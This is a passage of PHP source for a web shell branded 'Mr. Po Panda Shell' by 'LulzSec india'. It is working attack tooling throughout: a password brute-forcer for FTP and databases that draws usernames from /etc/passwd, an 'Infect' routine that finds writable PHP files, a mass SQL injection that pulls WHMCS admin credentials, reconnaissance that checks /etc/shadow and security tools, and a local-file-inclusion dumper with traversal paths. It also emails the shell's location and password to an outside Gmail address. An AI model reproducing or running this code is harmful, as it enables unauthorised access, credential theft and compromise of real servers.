  653. echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
  654. if( $_POST['proto'] == 'ftp' ) {
  655. function bruteForce($ip,$port,$login,$pass) {
  656. $fp = @ftp_connect($ip, $port?$port:21);
  657. if(!$fp) return false;
  658. $res = @ftp_login($fp, $login, $pass);
  659. @ftp_close($fp);
  660. return $res;
  661. }
  662. } elseif( $_POST['proto'] == 'mysql' ) {
  663. function bruteForce($ip,$port,$login,$pass) {
  664. $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
  665. @mysql_close($res);
  666. return $res;
  667. }
  668. } elseif( $_POST['proto'] == 'pgsql' ) {
  669. function bruteForce($ip,$port,$login,$pass) {
  670. $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''";
  671. $res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass);
  672. @pg_close($res);
  673. return $res;
  674. }
  675. }
  676. $success = 0;
  677. $attempts = 0;
  678. $server = explode(":", $_POST['server']);
  679. if($_POST['type'] == 1) {
  680. $temp = @file('/etc/passwd');
  681. if( is_array($temp) )
  682. foreach($temp as $line) {
  683. $line = explode(":", $line);
  684. ++$attempts;
  685. if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
  686. $success++;
  687. echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
  688. }
  689. if(@$_POST['reverse']) {
  690. $tmp = "";
  691. for($i=strlen($line[0])-1; $i>=0; --$i)
  692. $tmp .= $line[0][$i];
  693. ++$attempts;
  694. if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
  695. $success++;
  696. echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
  697. }
  698. }
  699. }
  700. } elseif($_POST['type'] == 2) {
  701. $temp = @file($_POST['dict']);
  702. if( is_array($temp) )
  703. foreach($temp as $line) {
  704. $line = trim($line);
  705. ++$attempts;
  706. if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
  707. $success++;
  708. echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
  709. }
  710. }
  711. }
  712. echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
  713. }
  714. echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
  715. .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
  716. .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
  717. .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
  718. .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
  719. .'<span>Server:port</span></td>'
  720. .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
  721. .'<tr><td><span>Brute type</span></td>'
  722. .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
  723. .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
  724. .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
  725. .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
  726. .'<td><input type=text name=login value="LulzSec"></td></tr>'
  727. .'<tr><td><span>Dictionary</span></td>'
  728. .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
  729. .'</td></tr><tr><td></td><td><input type=submit value="Do it Lulz"></td></tr></form></table>';
  730. echo '</div><br>';
  731. printFooter();
  732. }
  733.  
  734.  
  735. function actionInfect() {
  736. printHeader();
  737. echo '<h1>Infect</h1><div class=content>';
  738. if ($_POST['p1'] == 'infect') {
  739. $target = $_SERVER['DOCUMENT_ROOT'];
  740. function ListFiles($dir) {
  741. if ($dh = opendir($dir)) {
  742. $files = Array();
  743. $inner_files = Array();
  744. while ($file = readdir($dh)) {
  745. if ($file != "." && $file != "..") {
  746. if (is_dir($dir . "/" . $file)) {
  747. $inner_files = ListFiles($dir . "/" . $file);
  748. if (is_array($inner_files)) $files = array_merge($files, $inner_files);
  749. } else {
  750. array_push($files, $dir . "/" . $file);
  751. }
  752. }
  753. }
  754. closedir($dh);
  755. return $files;
  756. }
  757. }
  758. foreach (ListFiles($target) as $key => $file) {
  759. $nFile = substr($file, -4, 4);
  760. if ($nFile == ".php") {
  761. if (($file <> $_SERVER['DOCUMENT_ROOT'] . $_SERVER['PHP_SELF']) && (is_writeable($file))) {
  762. echo "$file<br>";
  763. $i++;
  764. }
  765. }
  766. }
  767. echo "<font color=red size=14>$i</font>";
  768. } else {
  769. echo "<form method=post><input type=submit value=Infect name=infet></form>";
  770. echo 'Really want to infect the server?&nbsp;<a href=# onclick="g(null,null,\'infect\')">Yes</a></div>';
  771. }
  772. printFooter();
  773. }
  774.  
  775.  
  776.  
  777. function printFooter() {
  778. $is_writable = is_writable($GLOBALS['cwd'])?"<font color=lime>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
  779. echo '</div><div style="margin:1px;background:#000;"><div class="content" style="border-top:1px #56A3E9;">
  780. <table class="info" id="toolsTbl" cellpadding="3" cellspacing="0" width="100%">
  781. <tr>
  782. <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="'.htmlspecialchars($GLOBALS['cwd']).'"><input type=submit value="Submit"></form></td>
  783. <td><form onsubmit="g(\'FilesTools\',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value="Submit"></form></td>
  784. </tr>
  785. <tr>
  786. <td><form onsubmit="g(\'FilesMan\',null,\'mkdir\',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value="Submit"></form>'.$is_writable.'</td>
  787. <td><form onsubmit="g(\'FilesTools\',null,this.f.value,\'mkfile\');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value="Submit"></form>'.$is_writable.'</td>
  788. </tr>
  789. <tr>
  790. <td><form onsubmit="g(\'Console\',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value="Submit"></form></td>
  791. <td><form method="post" ENCTYPE="multipart/form-data">
  792. <input type=hidden name=a value="FilesMAn">
  793. <input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
  794. <input type=hidden name=p1 value="uploadFile">
  795. <input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  796. <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value="Submit"></form>'.$is_writable.'</td>
  797. </tr>
  798. </table></div></div>
  799. <div style="margin:5px;background:#000;"><div class="content" style="border-top:1px #56A3E9;text-align:center;font-weight:bold;"><font color="#2052ff">Mr. Po Panda Shell '.VERSION.'<br>WE ARE: <marquee width="50%"> LulzSec india </marquee></font></div></div>
  800. </div>
  801. </body></html>';
  802. }
  803. if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
  804. if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
  805.  
  806. if(!isset($_SESSION['trimite'])){
  807. $url=" IP: ".gethostbyname($_SERVER["HTTP_HOST"]);
  808. $to="popanda1337@gmail.com";
  809. $subject = "Shell 5.0 Uploaded";
  810. $header = "from: New Shell";
  811. $message = " link : http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."\r\n";
  812. "User IP: ".$_SERVER['REMOTE_ADDR'].(isset($_SERVER['HTTP_X_FORWARDED_FOR'])?'('.$_SERVER['HTTP_X_FORWARDED_FOR'].')':'');
  813. $message.="Path :"._file_;
  814. $message.="Pass :".$auth_pass;
  815. $sentmail = @mail($to,$subject,$message,$header);
  816.  
  817.  
  818.  
  819. }
  820. function viewSize($s) {
  821. if($s >= 1073741824)
  822. return sprintf('%1.2f', $s / 1073741824 ). ' GB';
  823. elseif($s >= 1048576)
  824. return sprintf('%1.2f', $s / 1048576 ) . ' MB';
  825. elseif($s >= 1024)
  826. return sprintf('%1.2f', $s / 1024 ) . ' KB';
  827. else
  828. return $s . ' B';
  829. }
  830. function perms($p) {
  831. if (($p & 0xC000) == 0xC000)$i = 's';
  832. elseif (($p & 0xA000) == 0xA000)$i = 'l';
  833. elseif (($p & 0x8000) == 0x8000)$i = '-';
  834. elseif (($p & 0x6000) == 0x6000)$i = 'b';
  835. elseif (($p & 0x4000) == 0x4000)$i = 'd';
  836. elseif (($p & 0x2000) == 0x2000)$i = 'c';
  837. elseif (($p & 0x1000) == 0x1000)$i = 'p';
  838. else $i = 'u';
  839. $i .= (($p & 0x0100) ? 'r' : '-');
  840. $i .= (($p & 0x0080) ? 'w' : '-');
  841. $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
  842. $i .= (($p & 0x0020) ? 'r' : '-');
  843. $i .= (($p & 0x0010) ? 'w' : '-');
  844. $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
  845. $i .= (($p & 0x0004) ? 'r' : '-');
  846. $i .= (($p & 0x0002) ? 'w' : '-');
  847. $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
  848. return $i;
  849. }
  850. function viewPermsColor($f) {
  851. if (!@is_readable($f))
  852. return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
  853. elseif (!@is_writable($f))
  854. return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
  855. else
  856. return '<font color=#00BB00><b>'.perms(@fileperms($f)).'</b></font>';
  857. }
  858. if(!function_exists("scandir")) {
  859. function scandir($dir) {
  860. $dh = opendir($dir);
  861. while (false !== ($filename = readdir($dh))) {
  862. $files[] = $filename;
  863. }
  864. return $files;
  865. }
  866. }
  867. //shive function will b here //start
  868.  
  869. function actionshiv()// oops he have given there shiv now here it was shive so err
  870. {
  871. printHeader();
  872.  
  873.  
  874. echo '<body bgcolor=black>
  875. <center><font color=orange>
  876. <h1>Mass SQLi WHMCS</h1>
  877. <form method=post>
  878. <textarea name=sites rows=10 cols=50 placeholder="http://www.cybernamix.com.au"></textarea><br><br>
  879. <input type=submit></form><hr>';
  880.  
  881. if(isset($_POST['sites'])){
  882.  
  883. $exp=explode("\r\n",$_POST['sites']);
  884. foreach($exp as $url){
  885.  
  886. $site = $url."/viewticket.php";
  887.  
  888. $post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,concat(0x3c2f7469746c653e7665727361696c6c6573,(select(@x)from(select(@x:=0x00),(select(0)from(tbladmins)where(@x:=concat(@x,0x0d0a,username,0x207c20,password))))x),0x3c62723e736563376f727465616d),0,0,0,0,0,0,0,0,0,0,0#";
  889.  
  890.  
  891. $ch = curl_init();
  892. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
  893. curl_setopt($ch, CURLOPT_URL, $site);
  894. curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  895. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  896. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  897. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  898. $exec = curl_exec($ch);
  899. curl_close($ch);
  900.  
  901. if(eregi('versailles',$exec)){
  902.  
  903. echo "<font color=orange> [+] ".$url."</font><font color=lime> [INJECTED] </font><br>";
  904. echo "<font color=lime>";
  905. echo ikkeh($exec,"versailles","sec7orteam");
  906.  
  907. echo "</font><hr>";
  908.  
  909. flush();
  910. ob_flush();
  911.  
  912. }else{
  913. echo "<font color=red>[-] ".$url." [NOT VULNERABLE]</font><br><hr>";
  914. }
  915.  
  916. }
  917. }
  918.  
  919. function ikkeh($txt,$awal,$akhir) {
  920. $pos1 = stripos($txt,$awal)+strlen($awal);
  921. $pos2 = stripos($txt,$akhir,$pos1+1);
  922. return substr($txt,$pos1,$pos2-$pos1);
  923. };
  924.  
  925.  
  926.  
  927. printFooter();
  928. }
  929.  
  930. //end
  931.  
  932.  
  933.  
  934.  
  935. function actionSecInfo() {
  936. printHeader();
  937. echo ' <span style="color:White;font-family:Iceland;text-shadow:red 0px 0px 10px" "font-size: 50pt;"> <h1>Server security information By LulzSec </h1><h1> LulzSec India </h1><div class=content>';
  938. function showSecParam($n, $v) {
  939. $v = trim($v);
  940. if($v) {
  941. echo '<span>'.$n.': </span>';
  942. if(strpos($v, "\n") === false)
  943. echo $v.'<br>';
  944. else
  945. echo '<pre class=ml1>'.$v.'</pre>';
  946. }
  947. }
  948. showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
  949. showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
  950. showSecParam('Open base dir', @ini_get('open_basedir'));
  951. showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
  952. showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
  953. showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
  954. $temp=array();
  955. if(function_exists('mysql_get_client_info'))
  956. $temp[] = "MySql (".mysql_get_client_info().")";
  957. if(function_exists('mssql_connect'))
  958. $temp[] = "MSSQL";
  959. if(function_exists('pg_connect'))
  960. $temp[] = "PostgreSQL";
  961. if(function_exists('oci_connect'))
  962. $temp[] = "Oracle";
  963. showSecParam('Supported databases', implode(', ', $temp));
  964. echo '<br>';
  965. if( $GLOBALS['os'] == 'nix' ) {
  966. $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
  967. $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
  968. $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
  969. showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
  970. showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
  971. showSecParam('OS version', @file_get_contents('/proc/version'));
  972. showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
  973. if(!$GLOBALS['safe_mode']) {
  974. echo '<br>';
  975. $temp=array();
  976. foreach ($userful as $item)
  977. if(which($item)){$temp[]=$item;}
  978. showSecParam('Userful', implode(', ',$temp));
  979. $temp=array();
  980. foreach ($danger as $item)
  981. if(which($item)){$temp[]=$item;}
  982. showSecParam('Danger', implode(', ',$temp));
  983. $temp=array();
  984. foreach ($downloaders as $item)
  985. if(which($item)){$temp[]=$item;}
  986. showSecParam('Downloaders', implode(', ',$temp));
  987. echo '<br/>';
  988. showSecParam('Hosts', @file_get_contents('/etc/hosts'));
  989. showSecParam('HDD space', ex('df -h'));
  990. showSecParam('Mount options', @file_get_contents('/etc/fstab'));
  991. }
  992. } else {
  993. showSecParam('OS Version',ex('ver'));
  994. showSecParam('Account Settings',ex('net accounts'));
  995. showSecParam('User Accounts',ex('net user'));
  996. }
  997. echo '</div>';
  998. printFooter();
  999. }
  1000.  
  1001. function actionlfiscan() {
  1002. printHeader();
  1003. print '
  1004. <h3>LFI File dumper By LulzSec</h3>
  1005.  
  1006. <form method="post" action="?"><input type="hidden" name="a" value="lfiscan">
  1007. LFI URL: <input type="text" size="60" name="lfiurl" value=""> <input type="submit" value="Go"> File: <select name="scantype">
  1008. <option value="1">
  1009. Access Log
  1010. </option>
  1011.  
  1012. <option value="2">
  1013. httpd.conf
  1014. </option>
  1015.  
  1016. <option value="3">
  1017. Error Log
  1018. </option>
  1019. <option value="4">
  1020. php.ini
  1021. </option>
  1022. <option value="5">
  1023. MySQL
  1024. </option>
  1025. <option value="6">
  1026. FTP
  1027. </option>
  1028. <option value="7">
  1029. Environ
  1030. </option>
  1031. </select> Null: <select name="null">
  1032. <option value="%00">
  1033. Yes
  1034. <option value="">
  1035. No
  1036. </option>
  1037. </select> User-Agent: <input type="text" size="20" name="custom_header" value="">
  1038. </form>';
  1039. error_reporting(0);
  1040. if($_POST['lfiurl']) {
  1041. print "<pre>";
  1042. $cheader = $_POST['custom_header'];
  1043. $target = $_POST['lfiurl'];
  1044. $type = $_POST['scantype'];
  1045. $byte1 = $_POST['null'];
  1046. $lfitest = "../../../../../../../../../../../../../../etc/passwd".$byte1."";
  1047. $lfitest2 = "../../../../../../../../../../../../../../fake/file".$byte1."";
  1048. $lfiprocenv = "../../../../../../../../../../../../../../proc/environ".$byte1."";
  1049. $lfiaccess = array(
  1050. 1 => "../../../../../../../../../../../../../../apache/logs/access.log".$byte1."",
  1051. 2 => "../../../../../../../../../../../../../../etc/httpd/logs/acces_log".$byte1."",
  1052. 3 => "../../../../../../../../../../../../../../etc/httpd/logs/acces.log".$byte1."",
  1053. 4 => "../../../../../../../../../../../../../../var/www/logs/access_log".$byte1."",
  1054. 5 => "../../../../../../../../../../../../../../var/www/logs/access.log".$byte1."",
  1055. 6 => "../../../../../../../../../../../../../../usr/local/apache/logs/access_log".$byte1."",
  1056. 7 => "../../../../../../../../../../../../../../usr/local/apache/logs/access.log".$byte1."",
  1057. 8 => "../../../../../../../../../../../../../../var/log/apache/access_log".$byte1."",
  1058. 9 => "../../../../../../../../../../../../../../var/log/apache2/access_log".$byte1."",
  1059. 10 => "../../../../../../../../../../../../../../var/log/apache/access.log".$byte1."",
  1060. 11 => "../../../../../../../../../../../../../../var/log/apache2/access.log".$byte1."",
  1061. 12 => "../../../../../../../../../../../../../../var/log/access_log".$byte1."",
  1062. 13 => "../../../../../../../../../../../../../../var/log/access.log".$byte1."",
  1063. 14 => "../../../../../../../../../../../../../../var/log/httpd/access_log".$byte1."",
  1064. 15 => "../../../../../../../../../../../../../../apache2/logs/access.log".$byte1."",
  1065. 16 => "../../../../../../../../../../../../../../logs/access.log".$byte1."",
  1066. 17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access_log".$byte1."",
  1067. 18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access.log".$byte1."",
  1068. 19 => "../../../../../../../../../../../../../../var/log/httpd/access.log".$byte1."",
  1069. 20 => "../../../../../../../../../../../../../../opt/lampp/logs/access_log".$byte1."",
  1070. 21 => "../../../../../../../../../../../../../../opt/xampp/logs/access_log".$byte1."",
  1071. 22 => "../../../../../../../../../../../../../../opt/lampp/logs/access.log".$byte1."",
  1072. 23 => "../../../../../../../../../../../../../../opt/xampp/logs/access.log".$byte1."");
  1073.  
  1074. $lfierror = array(
  1075. 1 => "../../../../../../../../../../../../../../apache/logs/error.log".$byte1."",
  1076. 2 => "../../../../../../../../../../../../../../etc/httpd/logs/error_log".$byte1."",
  1077. 3 => "../../../../../../../../../../../../../../etc/httpd/logs/error.log".$byte1."",
  1078. 4 => "../../../../../../../../../../../../../../var/www/logs/error_log".$byte1."",
  1079. 5 => "../../../../../../../../../../../../../../var/www/logs/error.log".$byte1."",
  1080. 6 => "../../../../../../../../../../../../../../usr/local/apache/logs/error_log".$byte1."",
  1081. 7 => "../../../../../../../../../../../../../../usr/local/apache/logs/error.log".$byte1."",
  1082. 8 => "../../../../../../../../../../../../../../var/log/apache/error_log".$byte1."",
  1083. 9 => "../../../../../../../../../../../../../../var/log/apache2/error_log".$byte1."",
  1084. 10 => "../../../../../../../../../../../../../../var/log/apache/error.log".$byte1."",
  1085. 11 => "../../../../../../../../../../../../../../var/log/apache2/error.log".$byte1."",
  1086. 12 => "../../../../../../../../../../../../../../var/log/error_log".$byte1."",
  1087. 13 => "../../../../../../../../../../../../../../var/log/error.log".$byte1."",
  1088. 14 => "../../../../../../../../../../../../../../var/log/httpd/error_log".$byte1."",
  1089. 15 => "../../../../../../../../../../../../../../apache2/logs/error.log".$byte1."",
  1090. 16 => "../../../../../../../../../../../../../../logs/error.log".$byte1."",
  1091. 17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error_log".$byte1."",
  1092. 18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error.log".$byte1."",
  1093. 19 => "../../../../../../../../../../../../../../var/log/httpd/error.log".$byte1."",
  1094. 20 => "../../../../../../../../../../../../../../opt/lampp/logs/error_log".$byte1."",
  1095. 21 => "../../../../../../../../../../../../../../opt/xampp/logs/error_log".$byte1."",
  1096. 22 => "../../../../../../../../../../../../../../opt/lampp/logs/error.log".$byte1."",
  1097. 23 => "../../../../../../../../../../../../../../opt/xampp/logs/error.log".$byte1."");
  1098.  
  1099. $lficonfig = array(
  1100. 1 => "../../../../../../../../../../../../../../../usr/local/apache/conf/httpd.conf".$byte1."",
  1101. 2 => "../../../../../../../../../../../../../../../usr/local/apache2/conf/httpd.conf".$byte1."",
  1102. 3 => "../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf".$byte1."",
  1103. 4 => "../../../../../../../../../../../../../../../etc/apache/conf/httpd.conf".$byte1."",
  1104. 5 => "../../../../../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf".$byte1."",
  1105. 6 => "../../../../../../../../../../../../../../../etc/apache2/httpd.conf".$byte1."",
  1106. 7 => "../../../../../../../../../../../../../../../usr/local/apache/httpd.conf".$byte1."",
  1107. 8 => "../../../../../../../../../../../../../../../usr/local/apache2/httpd.conf".$byte1."",
  1108. 9 => "../../../../../../../../../../../../../../../usr/local/httpd/conf/httpd.conf".$byte1."",
  1109. 10 => "../../../../../../../../../../../../../../../usr/local/etc/apache2/conf/httpd.conf".$byte1."",
  1110. 11 => "../../../../../../../../../../../../../../../usr/local/etc/httpd/conf/httpd.conf".$byte1."",
  1111. 12 => "../../../../../../../../../../../../../../../usr/apache2/conf/httpd.conf".$byte1."",
  1112. 13 => "../../../../../../../../../../../../../../../usr/apache/conf/httpd.conf".$byte1."",
  1113. 14 => "../../../../../../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf".$byte1."",
  1114. 15 => "../../../../../../../../../../../../../../../usr/local/apps/apache/conf/httpd.conf".$byte1."",
  1115. 16 => "../../../../../../../../../../../../../../../etc/apache2/conf/httpd.conf".$byte1."",
  1116. 17 => "../../../../../../../../../../../../../../../etc/http/conf/httpd.conf".$byte1."",
  1117. 18 => "../../../../../../../../../../../../../../../etc/httpd/httpd.conf".$byte1."",
  1118. 19 => "../../../../../../../../../../../../../../../etc/http/httpd.conf".$byte1."",
  1119. 20 => "../../../../../../../../../../../../../../../etc/httpd.conf".$byte1."",
  1120. 21 => "../../../../../../../../../../../../../../../opt/apache/conf/httpd.conf".$byte1."",
  1121. 22 => "../../../../../../../../../../../../../../../opt/apache2/conf/httpd.conf".$byte1."",
  1122. 23 => "../../../../../../../../../../../../../../../var/www/conf/httpd.conf".$byte1."",
  1123. 24 => "../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf".$byte1."",
  1124. 25 => "../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf.default".$byte1."",
  1125. 26 => "../../../../../../../../../../../../../../../Volumes/webBackup/opt/apache2/conf/httpd.conf".$byte1."",
  1126. 27 => "../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf".$byte1."",
  1127. 28 => "../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf.default".$byte1."",
  1128. 29 => "../../../../../../../../../../../../../../../usr/local/php/httpd.conf.php".$byte1."",
  1129. 30 => "../../../../../../../../../../../../../../../usr/local/php4/httpd.conf.php".$byte1."",
  1130. 31 => "../../../../../../../../../../../../../../../usr/local/php5/httpd.conf.php".$byte1."",
  1131. 32 => "../../../../../../../../../../../../../../../usr/local/php/httpd.conf".$byte1."",
  1132. 33 => "../../../../../../../../../../../../../../../usr/local/php4/httpd.conf".$byte1."",
  1133. 34 => "../../../../../../../../../../../../../../../usr/local/php5/httpd.conf".$byte1."",
  1134. 35 => "../../../../../../../../../../../../../../../usr/local/etc/apache/vhosts.conf".$byte1."");
  1135.  
  1136. $lfiphpini = array(
  1137. 1 => "../../../../../../../../../../../../../../../etc/php.ini".$byte1."",
  1138. 2 => "../../../../../../../../../../../../../../../bin/php.ini".$byte1."",
  1139. 3 => "../../../../../../../../../../../../../../../etc/httpd/php.ini".$byte1."",
  1140. 4 => "../../../../../../../../../../../../../../../usr/lib/php.ini".$byte1."",
  1141. 5 => "../../../../../../../../../../../../../../../usr/lib/php/php.ini".$byte1."",
  1142. 6 => "../../../../../../../../../../../../../../../usr/local/etc/php.ini".$byte1."",
  1143. 7 => "../../../../../../../../../../../../../../../usr/local/lib/php.ini".$byte1."",
  1144. 8 => "../../../../../../../../../../../../../../../usr/local/php/lib/php.ini".$byte1."",
  1145. 9 => "../../../../../../../../../../../../../../../usr/local/php4/lib/php.ini".$byte1."",
  1146. 10 => "../../../../../../../../../../../../../../../usr/local/php5/lib/php.ini".$byte1."",
  1147. 11 => "../../../../../../../../../../../../../../../usr/local/apache/conf/php.ini".$byte1."",
  1148. 12 => "../../../../../../../../../../../../../../../etc/php4.4/fcgi/php.ini".$byte1."",
  1149. 13 => "../../../../../../../../../../../../../../../etc/php4/apache/php.ini".$byte1."",
  1150. 14 => "../../../../../../../../../../../../../../../etc/php4/apache2/php.ini".$byte1."",
  1151. 15 => "../../../../../../../../../../../../../../../etc/php5/apache/php.ini".$byte1."",
  1152. 16 => "../../../../../../../../../../../../../../../etc/php5/apache2/php.ini".$byte1."",
  1153. 17 => "../../../../../../../../../../../../../../../etc/php/php.ini".$byte1."",
  1154. 18 => "../../../../../../../../../../../../../../../etc/php/php4/php.ini".$byte1."",
  1155. 19 => "../../../../../../../../../../../../../../../etc/php/apache/php.ini".$byte1."",
  1156. 20 => "../../../../../../../../../../../../../../../etc/php/apache2/php.ini".$byte1."",
  1157. 21 => "../../../../../../../../../../../../../../../web/conf/php.ini".$byte1."",
  1158. 22 => "../../../../../../../../../../../../../../../usr/local/Zend/etc/php.ini".$byte1."",
  1159. 23 => "../../../../../../../../../../../../../../../opt/xampp/etc/php.ini".$byte1."",
  1160. 24 => "../../../../../../../../../../../../../../../var/local/www/conf/php.ini".$byte1."",
  1161. 25 => "../../../../../../../../../../../../../../../etc/php/cgi/php.ini".$byte1."",
  1162. 26 => "../../../../../../../../../../../../../../../etc/php4/cgi/php.ini".$byte1."",
  1163. 27 => "../../../../../../../../../../../../../../../etc/php5/cgi/php.ini".$byte1."");
  1164.  
  1165. $lfimysql = array(
  1166. 1 => "../../../../../../../../../../../../../../../var/log/mysql/mysql-bin.log".$byte1."",
  1167. 2 => "../../../../../../../../../../../../../../../var/log/mysql.log".$byte1."",
  1168. 3 => "../../../../../../../../../../../../../../../var/log/mysqlderror.log".$byte1."",
  1169. 4 => "../../../../../../../../../../../../../../../var/log/mysql/mysql.log".$byte1."",
  1170. 5 => "../../../../../../../../../../../../../../../var/log/mysql/mysql-slow.log".$byte1."",
  1171. 6 => "../../../../../../../../../../../../../../../var/mysql.log".$byte1."",
  1172. 7 => "../../../../../../../../../../../../../../../var/lib/mysql/my.cnf".$byte1."",
  1173. 8 => "../../../../../../../../../../../../../../../etc/mysql/my.cnf".$byte1."",
  1174. 9 => "../../../../../../../../../../../../../../../var/log/mysqld.log".$byte1."",
  1175. 10 => "../../../../../../../../../../../../../../../etc/my.cnf".$byte1."");
  1176.  
  1177. $lfiftp = array(
  1178. 1 => "../../../../../../../../../../../../../../../etc/logrotate.d/proftpd".$byte1."",
  1179. 2 => "../../../../../../../../../../../../../../../www/logs/proftpd.system.log".$byte1."",
  1180. 3 => "../../../../../../../../../../../../../../../var/log/proftpd".$byte1."",
  1181. 4 => "../../../../../../../../../../../../../../../etc/proftp.conf".$byte1."",
  1182. 5 => "../../../../../../../../../../../../../../../etc/protpd/proftpd.conf".$byte1."",
  1183. 6 => "../../../../../../../../../../../../../../../etc/vhcs2/proftpd/proftpd.conf".$byte1."",
  1184. 7 => "../../../../../../../../../../../../../../../etc/proftpd/modules.conf".$byte1."",
  1185. 8 => "../../../../../../../../../../../../../../../var/log/vsftpd.log".$byte1."",
  1186. 9 => "../../../../../../../../../../../../../../../etc/vsftpd.chroot_list".$byte1."",
  1187. 10 => "../../../../../../../../../../../../../../../etc/logrotate.d/vsftpd.log".$byte1."",
  1188. 11 => "../../../../../../../../../../../../../../../etc/vsftpd/vsftpd.conf".$byte1."",
  1189. 12 => "../../../../../../../../../../../../../../../etc/vsftpd.conf".$byte1."",
  1190. 13 => "../../../../../../../../../../../../../../../etc/chrootUsers".$byte1."",
  1191. 14 => "../../../../../../../../../../../../../../../var/log/xferlog".$byte1."",
  1192. 15 => "../../../../../../../../../../../../../../../var/adm/log/xferlog".$byte1."",
  1193. 16 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftpaccess".$byte1."",
  1194. 17 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftphosts".$byte1."",
  1195. 18 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftpusers".$byte1."",
  1196. 19 => "../../../../../../../../../../../../../../../usr/sbin/pure-config.pl".$byte1."",
